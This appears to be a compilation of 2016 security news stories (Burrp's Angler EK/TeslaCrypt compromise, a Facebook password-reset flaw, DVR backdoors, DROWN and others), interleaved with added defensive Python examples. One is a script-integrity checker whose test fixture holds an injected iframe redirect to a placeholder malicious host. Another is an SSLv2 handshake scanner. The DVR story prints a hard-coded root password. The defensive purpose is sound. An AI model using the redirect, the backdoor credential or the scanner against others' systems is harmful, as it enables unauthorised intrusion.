Cancer-care giant notifies 2.2 M patients of data breach

Fort Myers-based 21st Century Oncology, a US cancer-care giant, is warning its 2.2 million patients that their personal data was accessed by an unauthorized third party.


The Federal Bureau of Investigation (FBI) notified the company on November 13 that its database had been accessed without authorization.

According to the company, patients' names, Social Security numbers, physicians' names, diagnosis and treatment data and insurance information were accessed. In its statement, 21st Century Oncology also said it had hired a leading forensics firm to conduct an investigation. The company denied, however, that any medical records were accessed.

"We immediately hired a leading forensics firm to support our investigation, assess our systems and bolster security," the statement said. "In addition to security measures already in place, we have also taken additional steps to enhance internal security protocols to help prevent a similar incident in the future."

Patients have been sent notification letters to advise them of the breach of their data.

Those potentially affected have been offered a year of credit monitoring services free of charge.

"We also recommend that patients regularly review the explanation of benefits that they receive from their health insurer," the letter to patients states. "If they see services that they did not receive, please contact the insurer immediately."

News of the breach comes against the backdrop of two recent public relations blows for the company. The company paid a $34.6 million settlement to the federal government to settle a lawsuit alleging that it performed and billed for a procedure that was not medically necessary.

In December, it paid $19.75 million to settle another lawsuit from a whistleblower action related to claims of inappropriate billing for bladder cancer examinations.

Billion dollar bank theft prevented by hacker’s typo

Last month, a group of unknown hackers committed one of the largest bank robberies in history when they stole $80 million as part of a scheme involving the New York Federal Reserve Bank and the Bangladesh central bank, Reuters reported on Thursday (March 10).

The hackers breached the Bangladesh central bank's systems and flooded the Federal Reserve Bank with requests to transfer money out of the Bangladesh bank's accounts to accounts they had set up in the Philippines and one in Sri Lanka belonging to "the Shalika Foundation".

Four requests went through, moving about $81 million from the Bangladesh bank to the Philippines, but on the fifth, a $20 million transfer to a non-profit organization in Sri Lanka, they misspelled the NGO's name, writing "Shalika Fandation" instead of "Shalika Foundation". The typo prompted a routing bank, Deutsche Bank, to seek clarification from the Bangladesh central bank, and the transaction was stopped.

The Shalika Foundation, a supposed non-governmental organization, does not appear to exist at all.

International officials are busy cleaning up the financial mess left by February's breach, and an investigation team that includes the cybersecurity company FireEye is working on the case.

Bangladeshi officials say they have recovered only a fraction of the stolen funds and have little hope of apprehending the hackers.

The South Asian country has blamed the New York Fed for not stopping the theft in time. Finance Minister Abul Maal Abdul Muhith told Reuters that the country may file a lawsuit.

The theft comes a year after a group of hackers stole $300 million from over 100 banks worldwide. In that case, the hackers used malicious software to monitor activity at each bank via live video feed for months before carrying out the theft.

'Burrp' compromised to deliver Angler EK and TeslaCrypt

Burrp, a popular Indian restaurant recommendation site, is now serving its users an inedible dish of ransomware after the site was compromised.

Visitors to the site were redirected to the Angler exploit kit (EK), which then downloaded the TeslaCrypt ransomware to their computers.

Symantec (which notified Burrp of the compromise) claimed that, “The attack appears to be related to a technique described in a recent SANS advisory, as it used the gateway [MALICIOUS SITE].info/megaadvertize.”

Burrp was compromised when the attackers injected code into one of the site's JavaScript files (jquery-form.js). When users submitted a search through the form, they were immediately redirected to the site serving the Angler EK, which then deployed TeslaCrypt on unprotected machines.
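The defensive counterpart to this kind of tampering is a baseline check on the scripts a site serves. The following is an added example, not code from the article, from Burrp or from Symantec: it compares a served copy of a script against its known-good baseline and flags added lines that use redirect primitives. The file contents and the gateway hostname are constructed placeholders.

```python
import difflib
import hashlib
import re

# Constructed sample: a stub of the site's jquery-form.js as originally deployed
# (baseline) and the same file after an attacker appended a hidden-iframe redirect.
# The gateway hostname is a placeholder, not the one from the incident.
BASELINE_JS = """/* jquery-form.js (stub) */
(function ($) {
  $.fn.ajaxSubmit = function (options) { return this; };
})(jQuery);
"""
TAMPERED_JS = BASELINE_JS + (
    "document.write('<iframe src=\"http://MALICIOUS-SITE.example/megaadvertize\" "
    "width=\"1\" height=\"1\"></iframe>');\n"
)

# Constructs an injected redirector typically relies on. A hit only marks the
# added line for human review; it is not proof of compromise on its own.
SUSPICIOUS = re.compile(r"document\.write|<iframe|window\.location|eval\(|unescape\(", re.I)


def sha256_hex(text):
    return hashlib.sha256(text.encode("utf-8")).hexdigest()


def check_integrity(baseline, current):
    """Compare a served script with its baseline.

    Returns (modified, added_lines, flagged_lines): modified is False when the
    hashes match; otherwise added_lines are the lines present only in the served
    copy and flagged_lines the subset that matches SUSPICIOUS.
    """
    if sha256_hex(baseline) == sha256_hex(current):
        return False, [], []
    diff = difflib.ndiff(baseline.splitlines(), current.splitlines())
    added = [line[2:] for line in diff if line.startswith("+ ")]
    flagged = [line for line in added if SUSPICIOUS.search(line)]
    return True, added, flagged


if __name__ == "__main__":
    modified, added, flagged = check_integrity(BASELINE_JS, TAMPERED_JS)
    print("modified:", modified)
    for line in flagged:
        print("FLAGGED:", line)
```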

According to Symantec, once the EK's landing page has been decrypted using a key sent to the computer, "it attempts to exploit the Microsoft Windows OLE Remote Code Execution Vulnerability (CVE-2014-6332). If the exploit succeeds, then the TeslaCrypt payload is dropped onto the computer."

“If the exploit doesn’t work, then the kit drops an .swf file with an exploit for the Adobe Flash Player and AIR Unspecified Integer Overflow Vulnerability (CVE-2015-8651) to download TeslaCrypt onto the computer.”

The Angler Exploit Kit has also been observed delivering exploits for the Microsoft Silverlight Remote Code Execution Vulnerability (CVE-2016-0034).

The malicious URL in the Burrp compromise was also observed to contain the "megaadvertize" string, which has since changed to "hellomylittlepiggy".

Most of the users affected by the compromise are in the United States and India. Burrp has acknowledged the issue and is working to resolve it.

Korean Energy and Transportation Industries attacked by OnionDog APT

Chinese security researchers from cyber-security vendor Qihoo 360 have blown the lid off a hacker group, 'OnionDog', which has been infiltrating the energy, transportation and other infrastructure industries of Korean-language countries over the Internet and stealing information from them.

Big-data correlation analysis traced the group's first activity to October 2013; in each of the next two years it was active between late July and early September.

OnionDog has used an arsenal of Trojans and USB worms against its targets.

The Trojan, which lives for only about 15 days on average, was used to exfiltrate data from targeted companies and government agencies, while the USB worm was developed as a Stuxnet-like threat that could reach targets not connected to the Internet.

OnionDog concentrated its efforts on infrastructure industries in Korean-language countries.

In 2015 the group mainly attacked harbors, VTS, subways, public transportation and other transportation systems, but in the preceding year it attacked many Korean companies operating in the energy and water supply sectors.

360's Threat Intelligence Center found 96 groups of malicious code, all of it programmed to self-delete, with no malware variant living more than 29 days.

Researchers also discovered 14 command-and-control (C&C) domain names and IP addresses related to OnionDog, which in 2015 were moved to the darknet, operating via the Onion City Tor2web technology.

With an average life cycle of 15 days, the malware was harder for victim enterprises to notice and act on than malware that stays active for longer periods.

OnionDog's attacks were mainly carried out through spear-phishing emails containing Trojan-laced executables that used the icon of the popular Korean word-processing software Hangul.

Later in 2015, the group switched tactics and started leveraging software vulnerabilities in the Hangul editor to download and install their malware automatically.

A similar Hangul vulnerability seems to have been used by the Lazarus group, the APT suspected of carrying out the infamous Sony hack.


Even though nobody has said outright that the Lazarus group operates from North Korea, all clues point toward that conclusion, and they point to the same conclusion for OnionDog as well.

Turkish hacker pleads guilty to global ATM heist



A Turkish man alleged to have masterminded the theft of $55 million has pleaded guilty in a US court.


Ercan Findikoglu, 34, is alleged to have led the scheme, which withdrew money from cash machines around the world. He faces several charges, including bank fraud and computer intrusion conspiracy, for leading the hacking spree, and now faces more than 57 years in prison.


US prosecutors said attacks on three payment processing companies enabled the widespread theft, and have called the heist one of the most successful in recent times.


"By hacking into the computer networks of global financial institutions, the defendant and his co-conspirators were able to wreak havoc with the worldwide financial system by simultaneously withdrawing tens of millions of dollars,'' said US attorney Robert Capers in a statement.


Findikoglu and his gang stole customer data and used hacked credentials to change account-holders' daily withdrawal limits. They then used copied cards to withdraw money in a series of cyber attacks between 2010 and 2013.


In an attack in February 2013, the gang withdrew more than $40 million from 3,000 cash machines in an 11-hour period.


Findikoglu, who used the aliases "Segate" and "Predator", was extradited from Germany in June 2015, having been arrested there in December 2013. He will be sentenced on July 12.


Facebook paid $15,000 for a security flaw

We know that no website is totally free of security flaws, but when one of the most popular social media websites is affected, we wonder why engineers cannot build a site that is fully protected from hackers.

India-based web application expert Anand Prakash found a security flaw in Facebook that left millions of users exposed to brute-force password attacks.

According to the expert, one could make an unlimited number of guesses at the PIN on the company's beta websites while resetting a password, which led to the discovery of a simple but powerful security flaw.

"[The vulnerability] gave me full access to another user's account by setting a new password. I was able to view messages, his credit/debit cards stored under the payment section, personal photos etc. Facebook acknowledged the issue promptly, fixed it and rewarded $15,000 USD considering the severity and impact of the vulnerability," Prakash wrote in a blog post.

When users forget their password and click "Forgot password", they have two options for resetting it: entering a phone number or an email address, after which Facebook sends a six-digit verification code.

"I tried to brute the six digit code on www.facebook.com and was blocked after 10-12 invalid attempts," the researcher explained. "Then I looked out for the same issue on beta.facebook.com and mbasic.beta.facebook.com and interestingly 'rate limiting' was missing on the 'forgot password' endpoints."

The researcher attempted to reset the password on his own account and succeeded in setting a new password and logging into the profile. "Brute forcing the 'n' successfully allowed me to set a new password for any Facebook user," he added.

Prakash reported the bug to Facebook on 22 February, and it was patched within 24 hours. On 2 March, Facebook paid the researcher a $15,000 bug bounty for identifying the flaw.
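As an added illustration (not Facebook's code and not the researcher's), here is a minimal reset-code service in Python: with max_attempts=None it behaves like the beta endpoints that lacked rate limiting, where a six-digit code falls to at most a million guesses, while a per-code attempt budget invalidates the code long before that. The account name and the 10-minute code lifetime are assumptions.

```python
import hmac
import secrets
import time


class ResetCodeService:
    """Issues six-digit password-reset codes and checks guesses against them.

    max_attempts=None reproduces the missing rate limit on the beta endpoints;
    a small budget (the main site blocked after 10-12 tries) is the fix.
    """
    CODE_TTL_SECONDS = 600  # assumed lifetime of a code

    def __init__(self, max_attempts=10):
        self.max_attempts = max_attempts
        self._codes = {}  # account -> {"code", "expires", "attempts"}

    def issue(self, account):
        code = f"{secrets.randbelow(1_000_000):06d}"
        self._codes[account] = {"code": code,
                                "expires": time.time() + self.CODE_TTL_SECONDS,
                                "attempts": 0}
        return code  # a real service sends this to the user's phone or e-mail

    def verify(self, account, guess):
        entry = self._codes.get(account)
        if entry is None or time.time() > entry["expires"]:
            return False
        if self.max_attempts is not None and entry["attempts"] >= self.max_attempts:
            return False  # budget exhausted: this code is dead, a new one must be issued
        entry["attempts"] += 1
        if hmac.compare_digest(entry["code"], guess):
            del self._codes[account]  # single use
            return True
        return False


def correct_code_still_works_after(wrong_guesses, max_attempts):
    """Issue a code, submit `wrong_guesses` wrong guesses, then the right one.

    Returns True if the right code is still accepted afterwards, i.e. the
    endpoint can be searched one guess at a time without consequence.
    """
    service = ResetCodeService(max_attempts=max_attempts)
    account = "user@example.com"  # constructed
    code = service.issue(account)
    wrong = "000000" if code != "000000" else "000001"
    for _ in range(wrong_guesses):
        service.verify(account, wrong)
    return service.verify(account, code)


if __name__ == "__main__":
    print("no limit, 200 wrong guesses first:", correct_code_still_works_after(200, None))
    print("limit 10, 10 wrong guesses first:", correct_code_still_works_after(10, 10))
```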


27 million Mate1.com accounts hacked and sold

If you have an account on the online dating website Mate1.com, there is a very high probability that it has been hacked.

A hacker has claimed, in a post on the Hell forum, to have accessed the usernames, passwords and email addresses of 27 million people.

According to Motherboard (Vice), which first reported the hack, the hacker obtained the account details of over 27 million users and sold them to someone else in a deal brokered on the Hell forum.

The hacker told Motherboard that he managed to compromise the Mate1.com server and used command access to look at the MySQL database and then download parts of it.

He added that the dating website has a lax sign-up process that lets users log on without verifying their email address, meaning anyone can create an account with an email address that belongs to them or to someone else.

The hacker also revealed that Mate1 does not use any encryption to store passwords: if you have forgotten your password, it is sent to the corresponding email address in plain text.

It is not clear how much the hacker eventually sold the data for, although he was offering it 

Berkeley's Financial System hack might have affected 80,000

UC Berkeley's Financial System (BFS) was accessed by an unauthorized person or persons in December 2015, and officials have now started sending alert notices to approximately 80,000 current and former faculty, staff, students and vendors.

The university has no evidence that the hackers accessed, acquired or used any personal information, but officials are informing potential victims so that they can guard against possible misuse of their information and take advantage of the credit protection services the campus is offering free of charge.

UC Berkeley has informed both law enforcement and the FBI about the hack.

The BFS is used for all financial management, purchasing and most non-salary payments on the campus. The potential victims include about 57,000 current and former students; about 18,800 former and current employees, including student workers; and 10,300 vendors who do business with the campus.

“The security and privacy of the personal information provided to the university is of great importance to us,” said Paul Rivers, UC Berkeley’s chief information security officer. “We regret that this occurred and have taken additional measures to better safeguard that information.”

The campus is providing one year of free credit monitoring and identity theft insurance, along with resources to assist everyone who is connected with any kind of financial transaction with UC Berkeley.


Apple Is Said to Be Trying to Make It Harder to Hack iPhones


Apple engineers are busy developing security measures that would prevent government officials from breaking into locked iPhones. According to reports, the security upgrade would further protect customers' information from being accessed by the government.

This step by the company comes after a federal court fight in California in which the Obama administration won its fight over access to data stored in an iPhone used by one of the terrorists in November's San Bernardino attacks. In that case, the Justice Department is asking Apple to hack its own code.

FBI Director James Comey defended the government's request that Apple open the iPhone for it, adding that the bureau is only looking for assistance in this case.

But Apple CEO Tim Cook, in a letter to users, wrote that the devices are designed so that even Apple employees cannot access the contents of users' iPhones.


“The U.S. government has asked us for something we simply do not have, and something we consider too dangerous to create,” Cook said in a letter to users.

Meanwhile, experts say the only way out of this scenario is to get Congress involved. "We are in for an arms race unless and until Congress decides to clarify who has what obligations in situations like this," Benjamin Wittes, a senior fellow at the Brookings Institution, told The Times.

Digital video recorders give attackers the upper hand in breaching security codes


Digital video recorders that store surveillance footage are now becoming a way to compromise the security of home and business networks.


Around 80,000 digital video recorders (DVRs) either use hard-coded passwords or none at all, giving attackers a way in. Recently, 46,000 DVRs were found open to remote hijacking through a username and password hard-coded in the firmware.


Risk-Based Security chief researcher Carsten Eiram says most of the DVRs that record footage from surveillance cameras are operating in the US.


"Based on searches using Shodan.io, there are about 36,000 to 46,000 affected internet-connected devices," Eiram says. He added that the other countries where these devices are widely used are the UK, Canada, Mexico and Argentina.


"While analysing cgiServerbinary, we noticed that the authentication process specifically checked for the username 'root' and password '519070' [which is] the same code found in RscgiServerbinary," added Eiram.




The researchers' analysis states:
"The main() function of the CGI script calls a function to authenticate the user. Within this function, another function is eventually called to handle the authentication and return the result. The function retrieves the user-supplied credentials and calls a function to check them. Within this function, part of the code specifically checks if the supplied username is 'root' and the password is '519070'. If these credentials are supplied, full access is granted to the web interface."


The vulnerability was first reported to US-CERT on 9 September, but the report was not acknowledged until 21 December.


Some DVRs exposed on Shodan were also found to require no password at all, and could be hacked to give attackers a remote root shell that cannot be removed.


Experts say most devices will remain exposed, since changing the password is a pain: it requires connecting the DVR to a local TV with a user-supplied keyboard.

DROWN attack risks millions of popular websites

An international team of researchers has warned that more than 11 million websites and e-mail services protected by the Transport Layer Security (TLS) protocol are vulnerable to a new, low-cost attack that decrypts sensitive communications in a few hours.

The researchers, from universities in Israel, Germany and the US, along with a member of Google's security team, found that more than 81,000 of the top one million websites are vulnerable. They said many popular sites, including ones belonging to Samsung, Yahoo and a leading Indian bank, appeared to be vulnerable.

The DROWN attack works against TLS-protected communications that rely on the RSA cryptosystem when the key is exposed, even indirectly, through Secure Sockets Layer version 2 (SSLv2).

TLS is what allows everyone on the internet to browse the web, use e-mail, shop online and send instant messages without third parties being able to read the communication. DROWN allows attackers to break that encryption and read or steal sensitive communications, including passwords, credit card numbers, trade secrets or financial data. Under some common scenarios, an attacker can also impersonate a secure website and intercept or change the content the user sees.

While many security experts believed that removing SSLv2 support from browsers and e-mail clients had prevented abuse of the legacy protocol, some misconfigured TLS implementations still tacitly support it when a client specifically requests its use.

Websites, mail servers, and other TLS-dependent services are at risk for this attack, and many popular sites are affected.

In practice, older email servers would be more likely to have this problem than the newer computers typically used to power websites.

In addition, because many of the servers vulnerable to DROWN were also affected by a separate bug, a successful attack could be carried out using a home computer.

A fix has been issued, but it will take time for many website administrators to protect their systems.

The researchers have released a tool that identifies websites that appear to be vulnerable.
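The check at the heart of any such tool is whether a server still answers an SSLv2 handshake. The following is an added example, not the researchers' scanner: it sends an SSLv2 CLIENT-HELLO to a server you operate and reports which SSLv2 cipher specs the server answers with; a server that answers at all is a DROWN candidate and should have SSLv2 disabled. The SAMPLE_SERVER_HELLO bytes are constructed so the parser can be tested offline.

```python
import os
import socket
import struct
import sys

# SSLv2 cipher-spec identifiers (3 bytes each) from the SSLv2 specification.
# The 40-bit export ciphers are what make the DROWN oracle cheap to use.
SSLV2_CIPHERS = {
    b"\x01\x00\x80": "SSL_CK_RC4_128_WITH_MD5",
    b"\x02\x00\x80": "SSL_CK_RC4_128_EXPORT40_WITH_MD5",
    b"\x03\x00\x80": "SSL_CK_RC2_128_CBC_WITH_MD5",
    b"\x04\x00\x80": "SSL_CK_RC2_128_CBC_EXPORT40_WITH_MD5",
    b"\x05\x00\x80": "SSL_CK_IDEA_128_CBC_WITH_MD5",
    b"\x06\x00\x40": "SSL_CK_DES_64_CBC_WITH_MD5",
    b"\x07\x00\xc0": "SSL_CK_DES_192_EDE3_CBC_WITH_MD5",
}

# Constructed SERVER-HELLO accepting two ciphers, with a 3-byte dummy certificate
# and a 16-byte connection id; used only so the parser can be exercised offline.
SAMPLE_SERVER_HELLO = (b"\x80\x24" + b"\x04\x00\x01" + b"\x00\x02"
                       + b"\x00\x03\x00\x06\x00\x10" + b"CRT"
                       + b"\x01\x00\x80\x02\x00\x80" + b"C" * 16)


def build_client_hello(challenge=None):
    """SSLv2 CLIENT-HELLO offering every cipher spec above (2-byte record header)."""
    challenge = challenge or os.urandom(16)
    specs = b"".join(SSLV2_CIPHERS)
    body = (b"\x01" + b"\x00\x02"  # msg type CLIENT-HELLO, protocol version 2
            + struct.pack(">HHH", len(specs), 0, len(challenge))
            + specs + challenge)
    return struct.pack(">H", 0x8000 | len(body)) + body


def parse_server_hello(data):
    """Return the cipher names in an SSLv2 SERVER-HELLO, or None if the reply is
    not an SSLv2 record (a TLS alert, garbage, or an empty response)."""
    if len(data) < 13 or not data[0] & 0x80 or data[2] != 0x04:
        return None
    _version, cert_len, spec_len, _conn_len = struct.unpack(">HHHH", data[5:13])
    specs = data[13 + cert_len:13 + cert_len + spec_len]
    return [SSLV2_CIPHERS.get(specs[i:i + 3], specs[i:i + 3].hex())
            for i in range(0, len(specs), 3)]


def check_sslv2(host, port=443, timeout=5.0):
    """Connect, send the CLIENT-HELLO and parse whatever comes back."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_client_hello())
        try:
            reply = sock.recv(16384)  # SERVER-HELLO plus certificate fits one read
        except socket.timeout:
            reply = b""
    return parse_server_hello(reply)


if __name__ == "__main__":
    print(check_sslv2(sys.argv[1], int(sys.argv[2]) if len(sys.argv) > 2 else 443))
```

A result of None means the server did not speak SSLv2 on that port; a non-empty list is the set of SSLv2 ciphers it accepted and a reason to disable the protocol.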

The SSLv2 protocol was weakened because, at the time of its creation, the US government wanted to restrict the availability of strong encryption to other countries.

It has since eased its export limits, but the effects live on.